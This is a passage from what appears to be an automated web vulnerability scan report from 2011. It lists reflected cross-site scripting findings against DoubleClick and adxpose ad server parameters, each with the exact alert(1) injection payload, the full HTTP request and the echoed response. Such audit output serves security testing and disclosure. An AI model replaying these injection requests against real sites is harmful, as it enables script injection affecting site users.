Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:22:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7522

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
C4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.phpb2a53"-alert(1)-"e40a3ea8abb&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=http%3a%2f%2fwww.newark.com/jsp/bespoke/bespoke7.jsp%3Fbespokepage%3Dcommon/en/technology-first/whats-ne
...[SNIP]...

6.27. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [scres parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The value of the scres request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cc35"-alert(1)-"051d36dba0c was submitted in the scres parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=2cc35"-alert(1)-"051d36dba0c&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:23:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7522

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=2cc35"-alert(1)-"051d36dba0c&gen=&age=&zc=NzUyMDc&rurl=http%3a%2f%2fwww.newark.com/jsp/bespoke/bespoke7.jsp%3Fbespokepage%3Dcommon/en/technology-first/whats-new/whats-new.jsp%26CMP%3DBAN-NPI_np");
var fscUrl = url;
var fscUrl
...[SNIP]...

6.28. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [slotid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The value of the slotid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2f6a"-alert(1)-"f06f7fc0c92 was submitted in the slotid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQf2f6a"-alert(1)-"f06f7fc0c92&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:21:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7570

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQf2f6a"-alert(1)-"f06f7fc0c92&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rur
...[SNIP]...

6.29. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6370"-alert(1)-"73460471a7e was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?d6370"-alert(1)-"73460471a7e&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:20:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7522

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
ight="600" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af3/f/1c8/%2a/b%3B240097157%3B0-0%3B0%3B63021589%3B2321-160/600%3B41736528/41754315/1%3B%3B%7Esscs%3D%3fhttp://i.w55c.net/cl?d6370"-alert(1)-"73460471a7e&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid
...[SNIP]...

6.30. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab4c6"-alert(1)-"ca28abd453e was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1ab4c6"-alert(1)-"ca28abd453e&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:20:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7522

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
="600" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af3/f/1c8/%2a/b%3B240097157%3B0-0%3B0%3B63021589%3B2321-160/600%3B41736528/41754315/1%3B%3B%7Esscs%3D%3fhttp://i.w55c.net/cl?&t=1ab4c6"-alert(1)-"ca28abd453e&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&
...[SNIP]...

6.31. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [wp_exchange parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The value of the wp_exchange request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5d58"-alert(1)-"dd5e339e15d was submitted in the wp_exchange parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCAc5d58"-alert(1)-"dd5e339e15d&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:22:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7522

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
TgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCAc5d58"-alert(1)-"dd5e339e15d&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=http%3a%2f%2fwww.newark.com/jsp/bespoke/bespoke7.jsp%3Fbespokepage%3Dcommon/en/technology-first/whats-new/whats-new.jsp%26CMP%3DBAN-NPI_np");
var fscUrl
...[SNIP]...

6.32. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [zc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The value of the zc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 246a1"-alert(1)-"06d6b358119 was submitted in the zc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc246a1"-alert(1)-"06d6b358119&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:23:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7540

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
d=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc246a1"-alert(1)-"06d6b358119&rurl=http%3a%2f%2fwww.newark.com/jsp/bespoke/bespoke7.jsp%3Fbespokepage%3Dcommon/en/technology-first/whats-new/whats-new.jsp%26CMP%3DBAN-L0-Opto");
var fscUrl = url;
var fscUrlClickTagFound = fals
...[SNIP]...

6.33. http://ads.adxpose.com/ads/ads.js [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload ad34f<script>alert(1)</script>7e0dd690cc was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_289668ad34f<script>alert(1)</script>7e0dd690cc HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
